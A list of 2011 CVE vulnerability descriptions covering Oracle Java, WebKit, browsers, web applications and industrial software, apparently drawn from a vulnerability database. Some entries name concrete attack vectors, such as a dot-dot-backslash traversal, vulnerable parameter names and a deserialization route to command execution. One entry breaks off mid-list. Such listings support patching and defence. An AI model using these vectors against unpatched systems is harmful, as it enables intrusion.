[CVE-2011-3566] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.2.4, 10.0.2, 10.3.3, 10.3.4, and 10.3.5 allows remote attackers to affect availability via unknown vectors related to Web Container.
[CVE-2011-3560] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and integrity, related to JSSE.
[CVE-2011-3558] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to HotSpot.
[CVE-2011-3555] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 allows remote untrusted Java Web Start applications and untrusted Java applets to affect integrity and availability via unknown vectors.
[CVE-2011-3554] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, and 5.0 Update 31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors.
[CVE-2011-3550] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability, related to AWT.
[CVE-2011-3549] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Swing.
[CVE-2011-3548] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability, related to AWT.
[CVE-2011-3547] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Networking.
[CVE-2011-3546] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, and JavaFX 2.0 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and integrity via unknown vectors related to Deployment.
[CVE-2011-3544] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Scripting.
[CVE-2011-3531] Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.3, 11.1.1.4, and 11.1.1.5 allows remote attackers to affect availability via unknown vectors related to Web Services Security.
[CVE-2011-3526] Unspecified vulnerability in the Siebel Core - UIF Server component in Oracle Siebel CRM 8.0.0 and 8.1.1 allows remote authenticated users to affect confidentiality via unknown vectors related to User Interface.
[CVE-2011-3523] Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 10.1.3.5.0 and 10.1.3.5.1 allows remote authenticated users to affect integrity, related to WSM Console.
[CVE-2011-3521] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, and 5.0 Update 31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deserialization.
[CVE-2011-3518] Unspecified vulnerability in the Siebel Core - UIF Client component in Oracle Siebel CRM 8.0.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to User Interface.
[CVE-2011-3516] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 6 Update 27 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
[CVE-2011-3502] The web server in Cogent DataHub 7.1.1.63 and earlier allows remote attackers to obtain the source code of executable files via a request with a trailing (1) space or (2) %2e (encoded dot).
[CVE-2011-3500] Directory traversal vulnerability in the web server in Cogent DataHub 7.1.1.63 and earlier allows remote attackers to read arbitrary files via a ..\ (dot dot backslash) in an HTTP request.
[CVE-2011-3463] WebDAV Sharing in Apple Mac OS X 10.7.x before 10.7.3 does not properly perform authentication, which allows local users to gain privileges by leveraging access to (1) the server or (2) a bound directory.
[CVE-2011-3443] Use-after-free vulnerability in WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption and application crash) via vectors related to improper list management for Cascading Style Sheets (CSS) @font-face rules.
[CVE-2011-3426] Cross-site scripting (XSS) vulnerability in Safari in Apple iOS before 5 allows remote web servers to inject arbitrary web script or HTML via a file accompanied by a "Content-Disposition: attachment" HTTP header.
[CVE-2011-3424] Session fixation vulnerability in the Managed File Transfer server in TIBCO Managed File Transfer Internet Server before 7.1.1 and Managed File Transfer Command Center before 7.1.1, and the server in TIBCO Slingshot before 1.8.1, allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2011-3423] Cross-site scripting (XSS) vulnerability in the Managed File Transfer server in TIBCO Managed File Transfer Internet Server before 7.1.1 and Managed File Transfer Command Center before 7.1.1, and the server in TIBCO Slingshot before 1.8.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-3415] Open redirect vulnerability in the Forms Authentication feature in the ASP.NET subsystem in Microsoft .NET Framework 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted return URL, aka "Insecure Redirect in .NET Form Authentication Vulnerability."
[CVE-2011-3404] Microsoft Internet Explorer 6 through 9 does not properly use the Content-Disposition HTTP header to control rendering of the HTTP response body, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka "Content-Disposition Information Disclosure Vulnerability."
[CVE-2011-3402] Unspecified vulnerability in the TrueType font parsing engine in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted font data in a Word document or web page, as exploited in the wild in November 2011 by Duqu, aka "TrueType Font Parsing Vulnerability."
[CVE-2011-3397] The Microsoft Time component in DATIME.DLL in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted web site that leverages an unspecified "binary behavior" in Internet Explorer, aka "Microsoft Time Remote Code Execution Vulnerability."
[CVE-2011-3393] Multiple cross-site scripting (XSS) vulnerabilities in findagent.php in MYRE Real Estate Software allow remote attackers to inject arbitrary web script or HTML via the (1) country1, (2) state1, or (3) city1 parameter.
[CVE-2011-3392] Cross-site scripting (XSS) vulnerability in control.php in the controlcenter in Phorum before 5.2.17 allows remote attackers to inject arbitrary web script or HTML via the real_name parameter.
[CVE-2011-3390] Multiple cross-site scripting (XSS) vulnerabilities in index.php in IBM OpenAdmin Tool (OAT) before 2.72 for Informix allow remote attackers to inject arbitrary web script or HTML via the (1) informixserver, (2) host, or (3) port parameter in a login action.
[CVE-2011-3389] The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.
[CVE-2011-3385] Cross-site scripting (XSS) vulnerability in WebsiteBaker before 2.8, as used in LEPTON and possibly other products, allows remote attackers to inject arbitrary web script or HTML via unknown vectors, a different vulnerability than CVE-2006-2307.
[CVE-2011-3384] Cross-site scripting (XSS) vulnerability in the Sage add-on 1.3.10 and earlier for Firefox allows remote attackers to inject arbitrary web script or HTML via a crafted feed, a different vulnerability than CVE-2009-4102.
[CVE-2011-3383] Cross-site scripting (XSS) vulnerability in KENT-WEB WEB FORUM 5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors related to "the web page to be output."
[CVE-2011-3382] Cross-site scripting (XSS) vulnerability in Phorum before 5.2.16 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
[CVE-2011-3371] Multiple cross-site scripting (XSS) vulnerabilities in include/functions.php in PunBB before 1.3.6 allow remote attackers to inject arbitrary web script or HTML via the (1) id, (2) form_sent, (3) csrf_token, (4) req_confirm, or (5) delete parameter to delete.php, the (6) id, (7) form_sent, (8) csrf_token, (9) req_message, or (10) submit parameter to edit.php, the (11) action, (12) form_sent, (13) csrf_token, (14) req_email, or (15) request_pass parameter to login.php, the (16) email, (17) form_sent, (18) redirect_url, (19) csrf_token, (20) req_subject, (21) req_message, or (22) submit parameter to misc.php, the (23) action, (24) id, (25) form_sent, (26) csrf_token, (27) req_old_password, (28) req_new_password1, (29) req_new_password2, or (30) update parameter to profile.php, or the (31) action, (32) form_sent, (33) csrf_token, (34) req_username, (35) req_password1, (36) req_password2, (37) req_email1, (38) timezone, or (39) register parameter to register.php.
[CVE-2011-3361] Cross-site scripting (XSS) vulnerability in CGI/Browse.pm in BackupPC 3.2.0 and possibly other versions before 3.2.1 allows remote attackers to inject arbitrary web script or HTML via the num parameter in a browse action to index.cgi.
[CVE-2011-3358] Multiple cross-site scripting (XSS) vulnerabilities in MantisBT before 1.2.8 allow remote attackers to inject arbitrary web script or HTML via the (1) os, (2) os_build, or (3) platform parameter to (a) bug_report_page.php or (b) bug_update_advanced_page.php, related to use of the Projax library.
[CVE-2011-3356] Multiple cross-site scripting (XSS) vulnerabilities in config_defaults_inc.php in MantisBT before 1.2.8 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO, as demonstrated by the PATH_INFO to (1) manage_config_email_page.php, (2) manage_config_workflow_page.php, or (3) bugs/plugin.php.
[CVE-2011-3339] Cross-site scripting (XSS) vulnerability in the Admin Control Center in Sentinel HASP Run-time Environment 5.95 and earlier in SafeNet Sentinel HASP (formerly Aladdin HASP SRM) run-time installer before 6.x and SDK before 5.11, as used in 7 Technologies (7T) IGSS 7 and other products, when Firefox 2.0 is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors that trigger write access to a configuration file.
[CVE-2011-3320] Cross-site scripting (XSS) vulnerability in the Web Administrator component in GE Intelligent Platforms Proficy Historian 4.x and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2011-3319] Buffer overflow in the WRF parsing functionality in the Cisco WebEx Recording Format (WRF) player T26 before SP49 EP40 and T27 before SP28 allows remote attackers to execute arbitrary code via a crafted WRF file.
[CVE-2011-3317] Multiple cross-site scripting (XSS) vulnerabilities in the Solution Engine in Cisco Secure Access Control Server (ACS) 5.2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCtr78192.
[CVE-2011-3254] Cross-site scripting (XSS) vulnerability in Calendar in Apple iOS before 5 allows remote attackers to inject arbitrary web script or HTML via an invitation note.
[CVE-2011-3246] CFNetwork in Apple iOS before 5.0.1 and Mac OS X 10.7 before 10.7.2 does not properly parse URLs, which allows remote attackers to trigger visits to unintended web sites, and transmission of cookies to unintended web sites, via a crafted (1) http or (2) https URL.
[CVE-2011-3244] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-3243] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5 and Safari before 5.1.1, allows remote attackers to inject arbitrary web script or HTML via vectors involving inactive DOM windows.
[CVE-2011-3242] The Private Browsing feature in Apple Safari before 5.1.1 on Mac OS X does not properly recognize the Always value of the Block Cookies setting, which makes it easier for remote web servers to track users via a cookie.
[CVE-2011-3241] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-3239] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-3238] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-3237] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-3236] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-3235] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-3233] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-3231] The SSL implementation in Apple Safari before 5.1.1 on Mac OS X before 10.7 accesses uninitialized memory during the processing of X.509 certificates, which allows remote web servers to execute arbitrary code via a crafted certificate.
[CVE-2011-3230] Apple Safari before 5.1.1 on Mac OS X does not enforce an intended policy for file: URLs, which allows remote attackers to execute arbitrary code via a crafted web site.
[CVE-2011-3227] libsecurity in Apple Mac OS X before 10.7.2 does not properly handle errors during processing of a nonstandard extension in a Certificate Revocation List (CRL), which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted (1) web site or (2) e-mail message.
[CVE-2011-3218] The "Save for Web" selection in QuickTime Player in Apple Mac OS X through 10.6.8 exports HTML documents that contain an http link to a script file, which allows man-in-the-middle attackers to conduct cross-site scripting (XSS) attacks by spoofing the http server during local viewing of an exported document.
[CVE-2011-3213] The File Systems component in Apple Mac OS X before 10.7.2 does not properly track the specific X.509 certificate that a user manually accepted for an initial https WebDAV connection, which allows man-in-the-middle attackers to hijack WebDAV communication by presenting an arbitrary certificate for a subsequent connection.
[CVE-2011-3182] PHP before 5.3.7 does not properly check the return values of the malloc, calloc, and realloc library functions, which allows context-dependent attackers to cause a denial of service (NULL pointer dereference and application crash) or trigger a buffer overflow by leveraging the ability to provide an arbitrary value for a function argument, related to (1) ext/curl/interface.c, (2) ext/date/lib/parse_date.c, (3) ext/date/lib/parse_iso_intervals.c, (4) ext/date/lib/parse_tz.c, (5) ext/date/lib/timelib.c, (6) ext/pdo_odbc/pdo_odbc.c, (7) ext/reflection/php_reflection.c, (8) ext/soap/php_sdl.c, (9) ext/xmlrpc/libxmlrpc/base64.c, (10) TSRM/tsrm_win32.c, and (11) the strtotime function.
[CVE-2011-3181] Multiple cross-site scripting (XSS) vulnerabilities in the Tracking feature in phpMyAdmin 3.3.x before 3.3.10.4 and 3.4.x before 3.4.4 allow remote attackers to inject arbitrary web script or HTML via a (1) table name, (2) column name, or (3) index name.
[CVE-2011-3144] Cross-site scripting (XSS) vulnerability in Control Microsystems ClearSCADA 2005, 2007, and 2009 before R2.3 and R1.4, as used in SCX before 67 R4.5 and 68 R3.9, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-3142] Stack-based buffer overflow in an ActiveX control in KVWebSvr.dll in WellinTech KingView 6.52 and 6.53 allows remote attackers to execute arbitrary code via a long second argument to the ValidateUser method.
[CVE-2011-3140] IBM Web Application Firewall, as used on the G400 IPS-G400-IB-1 and GX4004 IPS-GX4004-IB-2 appliances with update 31.030, does not properly handle query strings with multiple instances of the same parameter, which allows remote attackers to bypass intended intrusion prevention by dividing a dangerous parameter value into substrings, as demonstrated by a SQL statement that is split across multiple iid parameters and then sent to a .aspx file on an IIS web server.
[CVE-2011-3133] Session fixation vulnerability in TIBCO Spotfire Server 3.0.x before 3.0.2, 3.1.x before 3.1.2, 3.2.x before 3.2.1, and 3.3.x before 3.3.1, and Spotfire Analytics Server before 10.1.1, allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2011-3132] Cross-site scripting (XSS) vulnerability in TIBCO Spotfire Server 3.0.x before 3.0.2, 3.1.x before 3.1.2, 3.2.x before 3.2.1, and 3.3.x before 3.3.1, and Spotfire Analytics Server before 10.1.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-3127] WordPress 3.1 before 3.1.3 and 3.2 before Beta 2 does not prevent rendering for (1) admin or (2) login pages inside a frame in a third-party HTML document, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site.
[CVE-2011-3106] The WebSockets implementation in Google Chrome before 19.0.1084.52 does not properly handle use of SSL, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
[CVE-2011-3083] browser/profiles/profile_impl_io_data.cc in Google Chrome before 19.0.1084.46 does not properly handle a malformed ftp URL in the SRC attribute of a VIDEO element, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted web page.
[CVE-2011-3054] The WebUI privilege implementation in Google Chrome before 17.0.963.83 does not properly perform isolation, which allows remote attackers to bypass intended access restrictions via unspecified vectors.
[CVE-2011-3052] The WebGL implementation in Google Chrome before 17.0.963.83 does not properly handle CANVAS elements, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
[CVE-2011-3049] Google Chrome before 17.0.963.83 does not properly restrict the extension web request API, which allows remote attackers to cause a denial of service (disrupted system requests) via a crafted extension.
[CVE-2011-3013] WebAdmin in the Mobility Pack before 1.2 in Novell Data Synchronizer 1.x through 1.1.2 build 428 supports weak SSL ciphers, which makes it easier for remote attackers to obtain access via a brute-force attack.
[CVE-2011-3010] Multiple cross-site scripting (XSS) vulnerabilities in TWiki before 5.1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the newtopic parameter in a WebCreateNewTopic action, related to the TWiki.WebCreateNewTopicTemplate topic
[CVE-2011-3004] The JSSubScriptLoader in Mozilla Firefox 4.x through 6 and SeaMonkey before 2.4 does not properly handle XPCNativeWrappers during calls to the loadSubScript method in an add-on, which makes it easier for remote attackers to gain privileges via a crafted web site that leverages certain unwrapping behavior.
[CVE-2011-3003] Mozilla Firefox before 7.0 and SeaMonkey before 2.4 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via an unspecified WebGL test case that triggers a memory-allocation error and a resulting out-of-bounds write operation.
[CVE-2011-3001] Mozilla Firefox 4.x through 6, Thunderbird before 7.0, and SeaMonkey before 2.4 do not prevent manual add-on installation in response to the holding of the Enter key, which allows user-assisted remote attackers to bypass intended access restrictions via a crafted web site that triggers an unspecified internal error.
[CVE-2011-2999] Mozilla Firefox before 3.6.23 and 4.x through 5, Thunderbird before 6.0, and SeaMonkey before 2.3 do not properly handle "location" as the name of a frame, which allows remote attackers to bypass the Same Origin Policy via a crafted web site, a different vulnerability than CVE-2010-0170.
[CVE-2011-2993] The implementation of digital signatures for JAR files in Mozilla Firefox 4.x through 5, SeaMonkey 2.x before 2.3, and possibly other products does not prevent calls from unsigned JavaScript code to signed code, which allows remote attackers to bypass the Same Origin Policy and gain privileges via a crafted web site, a different vulnerability than CVE-2008-2801.
[CVE-2011-2989] The browser engine in Mozilla Firefox 4.x through 5, SeaMonkey 2.x before 2.3, Thunderbird before 6, and possibly other products does not properly implement WebGL, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unspecified vectors.
[CVE-2011-2988] Buffer overflow in an unspecified string class in the WebGL shader implementation in Mozilla Firefox 4.x through 5, Thunderbird before 6, SeaMonkey 2.x before 2.3, and possibly other products allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a long source-code block for a shader.
[CVE-2011-2987] Heap-based buffer overflow in Almost Native Graphics Layer Engine (ANGLE), as used in the WebGL implementation in Mozilla Firefox 4.x through 5, Thunderbird before 6, SeaMonkey 2.x before 2.3, and possibly other products might allow remote attackers to execute arbitrary code via unspecified vectors.
[CVE-2011-2983] Mozilla Firefox before 3.6.20, Thunderbird 2.x and 3.x before 3.1.12, SeaMonkey 1.x and 2.x, and possibly other products do not properly handle the RegExp.input property, which allows remote attackers to bypass the Same Origin Policy and read data from a different domain via a crafted web site, possibly related to a use-after-free.
[CVE-2011-2981] The event-management implementation in Mozilla Firefox before 3.6.20, SeaMonkey 2.x, Thunderbird 3.x before 3.1.12, and possibly other products does not properly select the context for script to run in, which allows remote attackers to bypass the Same Origin Policy or execute arbitrary JavaScript code with chrome privileges via a crafted web site.
[CVE-2011-2976] Cross-site scripting (XSS) vulnerability in Bugzilla 2.16rc1 through 2.22.7, 3.0.x through 3.3.x, and 3.4.x before 3.4.12 allows remote attackers to inject arbitrary web script or HTML via vectors involving a BUGLIST cookie.
[CVE-2011-2958] Multiple cross-site scripting (XSS) vulnerabilities in Ecava IntegraXor before 3.60 (Build 4080) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-2947] Cross-zone scripting vulnerability in the RealPlayer ActiveX control in RealNetworks RealPlayer 11.0 through 11.1 and 14.0.0 through 14.0.5 and RealPlayer SP 1.0 through 1.1.5 allows remote attackers to inject arbitrary web script or HTML in the Local Zone via a local HTML document.
[CVE-2011-2942] A certain Red Hat patch to the __br_deliver function in net/bridge/br_forward.c in the Linux kernel 2.6.18 on Red Hat Enterprise Linux (RHEL) 5 allows remote attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by leveraging connectivity to a network interface that uses an Ethernet bridge device.
[CVE-2011-2938] Multiple cross-site scripting (XSS) vulnerabilities in filter_api.php in MantisBT before 1.2.7 allow remote attackers to inject arbitrary web script or HTML via a parameter, as demonstrated by the project_id parameter to search.php.
[CVE-2011-2937] Cross-site scripting (XSS) vulnerability in the UI messages functionality in Roundcube Webmail before 0.5.4 allows remote attackers to inject arbitrary web script or HTML via the _mbox parameter to the default URI.
[CVE-2011-2932] Cross-site scripting (XSS) vulnerability in activesupport/lib/active_support/core_ext/string/output_safety.rb in Ruby on Rails 2.x before 2.3.13, 3.0.x before 3.0.10, and 3.1.x before 3.1.0.rc5 allows remote attackers to inject arbitrary web script or HTML via a malformed Unicode string, related to a "UTF-8 escaping vulnerability."
[CVE-2011-2931] Cross-site scripting (XSS) vulnerability in the strip_tags helper in actionpack/lib/action_controller/vendor/html-scanner/html/node.rb in Ruby on Rails before 2.3.13, 3.0.x before 3.0.10, and 3.1.x before 3.1.0.rc5 allows remote attackers to inject arbitrary web script or HTML via a tag with an invalid name.
[CVE-2011-2904] Cross-site scripting (XSS) vulnerability in acknow.php in Zabbix before 1.8.6 allows remote attackers to inject arbitrary web script or HTML via the backurl parameter.
[CVE-2011-2900] Stack-based buffer overflow in the (1) put_dir function in mongoose.c in Mongoose 3.0, (2) put_dir function in yasslEWS.c in yaSSL Embedded Web Server (yasslEWS) 0.2, and (3) _shttpd_put_dir function in io_dir.c in Simple HTTPD (shttpd) 1.42 allows remote attackers to execute arbitrary code via an HTTP PUT request, as exploited in the wild in 2011.
[CVE-2011-2894] Spring Framework 3.0.0 through 3.0.5, Spring Security 3.0.0 through 3.0.5 and 2.0.0 through 2.0.6, and possibly other versions deserialize objects from untrusted sources, which allows remote attackers to bypass intended security restrictions and execute untrusted code by (1) serializing a java.lang.Proxy instance and using InvocationHandler, or (2) accessing internal AOP interfaces, as demonstrated using deserialization of a DefaultListableBeanFactory instance to execute arbitrary commands via the java.lang.Runtime class.
[CVE-2011-2892] Joomla! 1.6.x before 1.6.2 does not prevent page rendering inside a frame in a third-party HTML document, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site.
[CVE-2011-2873] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2011-2872] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2011-2871] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2011-2870] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2011-2869] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2011-2868] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2011-2867] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2011-2866] WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2012-03-07-1.
[CVE-2011-2849] The WebSockets implementation in Google Chrome before 14.0.835.163 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via unspecified vectors.
[CVE-2011-2833] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2011-2831] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-2820] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-2817] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-2816] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-2815] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-2814] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-2813] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-2811] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-2809] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-2802] Google V8, as used in Google Chrome before 13.0.782.107, does not properly perform const lookups, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted web site.
[CVE-2011-2800] Google Chrome before 13.0.782.107 allows remote attackers to obtain potentially sensitive information about client-side redirect targets via a crafted web site.
